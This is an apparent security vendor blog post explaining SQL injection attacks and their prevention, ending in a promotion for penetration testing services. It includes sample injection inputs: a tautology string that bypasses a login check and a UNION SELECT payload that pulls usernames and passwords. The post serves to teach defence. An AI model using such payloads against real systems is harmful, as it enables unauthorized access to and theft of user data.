Threat Intelligence • June 29, 2022
Databases are everywhere - from banking systems to grocery stores, healthcare and social media websites, they are at the heart of every program you use today. Given that they are such essential components of the modern-day business, they are also attractive targets for hackers. A common issue faced by websites or web applications that use these databases are SQL injection or SQLi attacks.
In this blog, we’re breaking down SQLi attacks - what they are, how they work, and how you can prevent them. Keep reading to learn more.
The most widely used programming language for handling relational Database Management Systems (DBMS) is Structured Query Language, or SQL. It is used to store, manipulate, and extract data from databases.
An SQL injection is a type of vulnerability that lets hackers tamper with the database queries made by an application, allowing them to modify or delete the existing data. Attackers leverage these vulnerabilities to trick the application or website into running malicious code. They then extract data that is normally inaccessible - such as data that belongs to others, and/or any other data that the application can access.
The consequences of a successful SQLi attack include:
Take this line of SQL code for example:
SELECT * FROM Users
WHERE userid =
AND password = ;
This query depends on user inputs for its return value. Now, an attacker with the userid ‘emma’ could enter the password as
‘name’
OR
‘a’ = ’a”
.
The condition
‘a’=’a’
is always evaluated as true, causing the query to execute the following code:
SELECT * FROM Users;
The attacker can now easily bypass the authentication requirements in the code and access all the entries in Users.
[Code sample source: OWASP]
In this type of SQL injection attack, the attacker uses the same communication channel to launch the attack and gather data. It is the most popular mode of attack. In-band SQL attacks can be error-based or union-based.
Error-based SQLi attacks use the error messages displayed by the database server to get information about the database. Union-based SQLi attacks merge the results of two or more SELECT statements using the UNION operator in SQL. The result is returned as a part of the HTTPS response.
Consider the following query:
SELECT country, city FROM location;
An attacker can use the following statement as a union injection:
UNION SELECT username, password FROM users;
This returns the combined results from location and users tables and the attacker can access all the usernames and passwords.
Also known as Blind SQL injections, inferential attacks are also a dangerous type of SQLi attack. The attacker cannot see the result of this attack and no data is transferred through the application. Blind SQLi attacks can be Blind-boolean based or Blind-time based.
Boolean-based injections drive the app to give back a different result based on the query. The HTTPS response changes based on the boolean result (TRUE or FALSE). If the content of the page differs from the page returned during the false condition, the attacker can conclude that SQL injection is effective.
In a time-based attack, the attacker causes a delay in the execution of the queries by sending an SQL command to the server along with the code. The response time of the query shows whether the result is true or false.
Listed below are some steps you can take to minimize the risk of SQL injection attacks on your website or web application:
Dynamic SQL coding can leave your application/website vulnerable to SQL injection attacks.
All database queries must be written using prepared statements with parameterized queries. This helps to differentiate between user inputs that could potentially be malicious and the actual code.
Regular penetration testing of your databases can expose threats such as XSS, injections, insecure passwords, and unpatched vulnerabilities. It can also determine how good your defenses are against different types of attacks including SQL injections. Additionally, regularly auditing your database for suspicious activity can provide better protection.
For applications that are connected to databases, it is critical to monitor all SQL statements.
It is much easier to spot unauthorized SQL statements and vulnerabilities when you have this visibility.
Attackers can take advantage of error messages to gather information about the database architecture. Using the "RemoteOnly" custom errors mode or its equivalent can ensure that error messages are only displayed in the local system without disclosing all the information to attackers.
SQLi is the most common attack vector today, accounting for
more than half
of all web application attacks. And because most websites rely on data stored in a database server, a malicious SQL injection attack can be detrimental for your business and customers. Test your IT infrastructure for vulnerabilities including SQLi with Evolve’s Automated Penetration Testing services. Our specialists use years of experience with deep expertise and cutting-edge tools to find security flaws faster than ever before and effectively reduce your risk of being exploited.
Schedule a session
with our team to evaluate your SQL security posture right away.
Related Content